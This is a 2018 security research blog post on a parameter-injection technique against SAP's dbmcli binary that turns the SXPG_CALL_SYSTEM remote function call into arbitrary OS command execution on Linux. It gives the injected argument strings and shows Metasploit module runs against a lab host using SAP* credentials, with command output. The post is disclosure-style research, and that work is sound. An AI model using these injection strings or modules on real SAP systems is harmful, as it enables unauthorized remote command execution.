Sunday, May 13, 2018

SAP Parameter Injection

The technique employed involves causing the executable to write attacker-controlled inputs to an attacker-controlled file. The executable is then used to read commands to execute from the same file. For example passing the following command line to the dbmcli executable results in the creation of a file named pwned.txt in the /tmp folder.
-o /tmp/pwned.txt –n pwnie\n!id\tfoo\n
The contents of the file are presented below.
Error! Connection failed to node pwnie
!id
 for database (no dbname):
unknown host pwnie
!id
 (see /etc/hosts
If the file is passed to the binary as illustrated in the command line below, then the commands prepended with an exclamation mark will be executed (in this case twice).
-ic /tmp/pwned.txt
The Remote Function Calls (RFCs) SXPG_CALL_SYSTEM and SXPG_COMMAND_EXEC can be used remotely to execute OS commands on SAP systems (as configured in transaction SM69). I previously blogged about this and the post can be found here. Authentication and relevant permissions are required.
On Windows systems, configured commands that accept additional parameters can be manipulated to execute arbitrary commands by injecting metacharacters; however on Linux they cannot – until now of course. By making use of the same exploit technique that Context IS did for the exploitation of the SAP Host Control vulnerability, we can execute arbitrary commands against Linux systems.
I have crafted several Metasploit modules to demonstrate this vector and the execution of the RFC SXPG_CALL_SYSTEM via the SOAP connector can be seen below.
msf  auxiliary(sap_soap_rfc_dbmcli_sxpg_call_system_command_exec) > show options

Module options (auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec):

  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  CLIENT   001              yes       Client
  CMD      id               yes       Command to run
  OS       Linux            yes       Windows/Linux
  PASS     06071992         yes       Password
  Proxies                   no        Use a proxy chain
  RHOSTS   172.16.252.150   yes       SAP ICM server address
  RPORT    8042             yes       SAP ICM server port number
  THREADS  1                yes       The number of concurrent threads
  USER     SAP*             yes       Username
  VHOST                     no        HTTP server virtual host

msf  auxiliary(sap_soap_rfc_dbmcli_sxpg_call_system_command_exec) > run

[*] 172.16.252.150:8042 - sending SOAP SXPG_COMMAND_EXECUTE request
[*] 172.16.252.150:8042 - got response
[*] 172.16.252.150:8042 - sending SOAP SXPG_COMMAND_EXECUTE request
[*] 172.16.252.150:8042 - got response

[SAP] SXPG_CALL_SYSTEM dbmcli Command Injection
===============================================

  Output
  ------
  ;!id
  uid=1001(npladm) gid=100(users) groups=100(users),1000(sapsys)

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf  auxiliary(sap_soap_rfc_dbmcli_sxpg_call_system_command_exec) > set CMD uname -a
CMD => uname -a
msf  auxiliary(sap_soap_rfc_dbmcli_sxpg_call_system_command_exec) > run

[*] 172.16.252.150:8042 - sending SOAP SXPG_COMMAND_EXECUTE request
[*] 172.16.252.150:8042 - got response
[*] 172.16.252.150:8042 - sending SOAP SXPG_COMMAND_EXECUTE request
[*] 172.16.252.150:8042 - got response

[SAP] SXPG_CALL_SYSTEM dbmcli Command Injection
===============================================

  Output
  ------
  ;!uname -a
  Linux linux-gateway 2.6.32.43-0.4-default #1 SMP 2011-07-14 14:47:44 +0200 x86_64 x86_64 x86_64 GNU/Linux

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
The output below illustrates the execution of the RFC SXPG_CALL_SYSTEM from the module directly against the RFC connector.
msf  auxiliary(sap_rfc_dbmcli_sxpg_call_system_command_exec) > run

[+] 172.16.252.150:3342 [SAP] Successful login - 001:SAP*:06071992
[+] 172.16.252.150:3342 [SAP] Successful login - 001:SAP*:06071992

[SAP] Command Exec
==================

   Output
   ------
   
   >!id
   uid=1001(npladm) gid=100(users) groups=100(users),1000(sapsys)

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
These modules and many more will be released and submitted to the framework very soon. In the mean time you can download the modules to try from here:

No comments:

Man in the Rain